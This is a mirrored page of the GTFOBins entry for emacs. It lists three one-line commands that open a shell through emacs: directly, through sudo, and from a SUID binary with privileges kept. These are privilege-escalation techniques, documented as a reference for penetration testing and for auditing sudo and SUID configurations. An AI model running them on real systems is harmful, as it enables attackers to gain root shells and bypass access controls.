1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 10:53:35 +02:00
GTFOBins.github.io/_gtfobins/emacs.md
2018-05-25 01:10:39 +02:00

234 B

functions
exec-interactive sudo-enabled suid-enabled
code
emacs -Q -nw --eval '(term "/bin/sh")'
code
sudo emacs -Q -nw --eval '(term "/bin/sh")'
code
./emacs -Q -nw --eval '(term "/bin/sh -p")'